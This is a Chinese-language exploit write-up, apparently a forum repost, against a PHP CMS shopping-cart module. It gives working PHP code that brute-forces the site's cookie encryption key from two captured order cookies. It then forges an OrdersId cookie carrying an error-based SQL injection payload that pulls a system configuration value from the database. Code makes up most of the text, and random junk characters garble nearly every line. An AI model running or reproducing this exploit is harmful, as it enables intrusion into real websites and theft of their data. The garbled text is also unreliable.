www.xxx.com/plus/search.php?keyword=/ J0 Q+ y3 C4 D' q8 G
在 include/shopcar.class.php中: ~, Z a3 o2 |2 K
先看一下这个shopcar类是如何生成cookie的
; U7 {4 Y) P& D2 C7 e6 r" J239 function saveCookie($key,$value); i* h3 C7 o* q" S. l; k- W- Q
240 {* y/ C* R: b! s( \" U
241 if(is_array($value))
0 f9 p/ r6 L$ F1 U" i# y& a242 {5 d' L& `" z, C- O! J6 w$ m3 e
243 $value = $this->enCrypt($this->enCode($value));
# r! r+ e. v6 L6 m244 }
8 D F4 x% [, b* S V; K# e245 else
" }6 B( V% ^4 H% }2 @* l246 {, Z* N- `3 ^' E: H$ n1 B7 Z/ t7 o! o% W
247 $value = $this->enCrypt($value);5 v4 g" w" h5 b( W, j8 f
248 }
5 x# J y* `/ Q" k% q5 k249 setcookie($key,$value,time()+36000,’/');/ ]+ |8 `) s+ D0 F; s0 M r
250 }& Y1 w5 Y8 O1 S4 k; k
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数2 @1 B7 B/ Y4 K6 w- P+ L O7 R, H6 Z
186 function enCrypt($txt)
' f7 B1 i9 J) n187 {
) e# H( k8 l. c3 X" z5 t/ X( ^188 srand((double)microtime() * 1000000);! U6 t6 v$ Z5 K; C& f* B
189 $encrypt_key = md5(rand(0, 32000));6 J/ A7 Q9 H& B3 J3 n" ^/ n
190 $ctr = 0; i1 a; h$ P4 ]5 e3 v, {* M% `5 O, x$ E5 z
191 $tmp = ”;5 i' ?9 Q4 u0 l8 G& q; ]
192 for($i = 0; $i < strlen($txt); $i++)
$ N2 w6 i4 J0 O* s3 U0 |8 d193 {4 n/ l+ D+ l+ Q) Y9 N
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
+ `: `# @0 X$ A195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
4 R" [; e3 G7 z! y% S196 }7 K- ]8 p2 i/ X( k5 \6 ~6 o
197 return base64_encode($this->setKey($tmp));
7 }" G9 w: Q4 ^% ]/ E198 }) }6 D! K3 D4 }
213 function setKey($txt)+ j ~& k4 l, [2 j0 j$ H
214 {
- y' Y0 o; w& Y& o# {215 global $cfg_cookie_encode;
' J5 s. T. s t8 T' ]$ U7 b. |" Y216 $encrypt_key = md5(strtolower($cfg_cookie_encode));1 a& s, k. T* w( _1 ]6 j/ N
217 $ctr = 0;! a! ?! J" a' |4 I
218 $tmp = ”;3 t7 M7 Z- i. S5 l
219 for($i = 0; $i < strlen($txt); $i++)
3 T6 _ K \' K7 d. q220 {7 b' A3 @3 G1 \
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) n. C: K! F( s. o, m
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
& X; h5 N8 n8 x, ~7 o$ P223 }) T. M$ w! j$ S
224 return $tmp;1 ?" K. o/ ]6 s* g% I, X, C2 O
225 }0 W' R, @$ r$ q- `' J
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的" [ a _; T$ q; x. C
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
3 ?6 x1 S5 K+ \, n具体代码如下:- B% N3 t, [( Q
<?php
1 {( `* I6 P, e" I1 T$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
; _: C: M; f: P/ b$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
0 f. C0 p6 a* T# h$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
2 L" A; t8 v6 Q) V4 e. i* Efunction reStrCode($code,$string)2 q: a {, f5 F6 D
{. r6 V6 J7 k0 K# p& `( o
$code = base64_decode($code);
5 b& L) l) t8 `$key = “”;
5 {! W7 x6 H1 ~, U0 G8 sfor($i=0 ; $i<32 ; $i++)- o% E4 h# }# t
{
+ O+ d5 }7 Y! W3 F$ G$key .= $string[$i] ^ $code[$i];1 u i0 ]4 e2 t! Z6 W; t7 s" u
}$ t1 f# u" ]( {- y! @/ K7 R
return $key;: }, f* z. R* A# o* h
}
' _& f* l0 \! ]6 I6 D+ K( Ifunction getKeys($cookie,$plantxt)" v6 b: d' z$ F3 e7 {
{
8 c0 @) k+ n! _$tmp = $cookie;
% ^' p0 |/ t6 N* X- [& e* d$results = array();
6 ?! J; T$ o0 g' E8 C' s5 N$ Ofor($j=0 ; $j < 32000; $j++)) T9 Q6 [, \6 G+ a5 h' ~( w' A: z7 Q
{
5 Y$ i: K: Z) Z% a) Q
5 T; ?( L$ a# I1 }0 p# x$ C+ R$txt = $plantxt;
' q% V5 I5 o; e1 _ K7 q" I$ctr = 0;/ t5 Z w) O! d# ^4 ?8 J/ B
$tmp = ”;
2 y& q; q3 t2 f9 U s1 A$encrypt_key = md5($j);
G4 z' Z8 k, k1 cfor($i =0; $i < strlen($txt); $i ++)# S8 R" @ d- F' S! e
{
: a" X% k1 w5 M" B, T' N( E: n8 T$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;6 n4 r# i3 c5 y1 v% Q
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
/ _" _: W7 o; G% o# g}2 a* x9 l/ g- B( B2 Y: B# K3 f
$string = $tmp;
" @8 s6 T$ l, L8 S" F/ f, ~$ m$code = $cookie;9 \, @. X% L. ^
$result = reStrCode($code,$string);9 Z- f$ l& y# q5 X$ N, k. _, O$ ` j
if(eregi(‘^[a-z0-9]+$’,$result))) b ?0 `$ |6 t' v
{7 |$ r( B+ s1 L+ U1 F- f3 [
echo $result.”\n”;
$ W) M( X# \3 \' n1 z$results[] = $result;
- z5 k2 G5 R9 K% d* m1 C: W}
& z1 a* V/ y b& {' F3 S8 D}; b! @- p) |; i% j F1 _9 Q
return $results;
/ p5 S# }* r) B- G6 O}$ n( |7 Q# j4 M% [
$results1 = getKeys($cookie1,$plantxt);" Q) c c' g# {' ^: y* S
$results2 = getKeys($cookie2,$plantxt);
c# ~9 [ s7 X) C U8 [print “\n——————–real key————————–\n”;$ ^3 c7 J7 r1 [6 [$ \
foreach($results1 as $test1)1 S2 j9 Y/ ^4 x! h/ f+ }- j
{# M: x C4 t+ {0 g+ S/ [
foreach($results2 as $test2)
% t1 [/ a" C4 q2 R' a2 J{9 c6 P7 O+ c, }$ k H* U
if($test1 == $test2)" K& u7 N' Z; H0 D+ x
{# X3 s# {) a1 A/ d# Y
echo $test1.”\n”;3 p. V9 y- c% `: u. a$ l
}
: Z0 p' q% H' }6 u}
5 _1 D7 j9 Y7 u) K5 Y \) q}
% G- v$ N3 D: I3 T?>
6 t: r& R" R$ r* Z2 z- q- jcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
8 a2 E# P" u& ]/ q+ I% g% @plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua15 i, b+ j! h# Z+ x# l) l6 [, k0 ?3 f
然后推算出md5(strtolower($cfg_cookie_encode))
2 e* Q" s; U5 I/ z& Y& u8 F& D/ f得到这个key之后,我们就可以构造任意购物车的cookie
/ l( U9 W5 x( ]5 o接着看* f+ m, Z$ S: q
20 class MemberShops/ j. F0 f) E- g- ^5 I0 X
21 {
' C: D% @$ c; [- B2 m, Y( c22 var $OrdersId;
/ J+ J7 O+ m. B9 F( T23 var $productsId;. q z& [/ Y+ r5 Z' ]
24
9 V# C8 |* d& P$ p6 l5 |; k25 function __construct()* @& m7 A v# b! {
26 {+ W2 `9 C6 k8 P2 w( l+ W- U1 v( S
27 $this->OrdersId = $this->getCookie(“OrdersId”);) k* e% z2 b5 O3 n5 d; t R
28 if(empty($this->OrdersId))
" A) D4 o0 r, l; p. V+ x29 {, B3 |- a$ }5 o) V/ R6 t
30 $this->OrdersId = $this->MakeOrders();
/ J y$ j- F! w: {) ^! i- G5 L' L31 }
! N" h: F! l. F" t2 h( z8 x& t32 }
' \/ l, T( L" ?! @7 B6 I6 f" j* A, j2 I发现OrderId是从cookie里面获取的3 W1 [7 J5 U. V: _. u; d0 P
然后
" u! B, T7 `, ]+ Z" H/plus/carbuyaction.php中的. U+ W6 {; F3 m2 \* }1 f4 n8 X3 h8 Q
29 $cart = new MemberShops();
9 d9 s6 b# n5 P! v: A7 H: f39 $OrdersId = $cart->OrdersId; //本次记录的订单号# \8 Y- s! Z- X4 \9 L
……
2 }" P, V: {( q& U ~173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
( K! J$ A3 P" G接着我们就可以注入了
. T8 v3 \5 q( Z& M( ?通过利用下面代码生成cookie:) p) S6 a9 G) s) a1 u7 h
<?php- d& N. C& i; v& @: H
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
% u; @6 W9 r4 }0 A% j$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
! H1 O( s9 O( r% | m [$ `function setKey($txt)
1 R& v8 ]' n$ m" t" j{
; |% v8 s5 p# ^; @6 H6 |; Jglobal $encrypt_key;1 A; w/ F$ @1 o* Q+ M
$ctr = 0;
0 S9 l( J7 A0 E( `* ~" r$tmp = ”;
1 b$ G$ K* b$ S( I' Hfor($i = 0; $i < strlen($txt); $i++)
2 Z# U% @8 S( @7 Z1 G+ m{. Q2 _0 ~3 _9 B1 y
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
- ~5 K+ e1 o4 Q/ z& i+ t$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];- g8 \2 L+ O k4 Y) O( z
}) s; F6 j: t( F6 F. ?
return $tmp;) t7 |7 g3 c' J: k6 T3 V. J2 O
}/ R# S9 U+ z& j3 V7 w
function enCrypt($txt)
1 C4 Y4 o& ?# s{
1 v( i, G( E" y- A ^srand((double)microtime() * 1000000);( V. J2 A, X- Q
$encrypt_key = md5(rand(0, 32000));
$ @! B2 w) Y' k0 L$ H$ctr = 0;
A* t- L) }+ _5 g! G# z5 V$tmp = ”;$ M% m3 X8 I& j
for($i = 0; $i < strlen($txt); $i++)
, [0 \; n8 _. V' @{
; h$ F: W5 {7 b5 W6 A' ?$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( L% p1 K6 u m) b8 \0 a& l y9 B
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
/ R$ F; O9 |# `! z1 O8 h. ]' N}
8 b2 R, v8 X' w/ lreturn base64_encode(setKey($tmp));/ U! k7 T1 Z* K1 L) w
}) H4 u: ~ i6 H9 p! F S
for($dest =0;$dest = enCrypt($txt);)
1 g6 g' l6 d: @{
3 D i9 {3 R4 `& s9 f* Wif(!strpos($dest,’+'))5 |3 X6 g/ ^" U+ l. j' s" o( y
{9 x8 e2 I3 g# S9 I4 E0 d" P
break;
$ W1 C% C' }- W6 J6 @( c J% d}
; b0 G% S, l" T, R g1 E}& C6 f- |4 i7 p- `6 Z
echo $dest.”\n”;
' q9 }4 Z/ U# W3 V: m- L?>, r# E4 ~1 r. H6 Q+ M3 K9 C
: e+ R: l% f# \5 A0 A' ]7 `3 S
|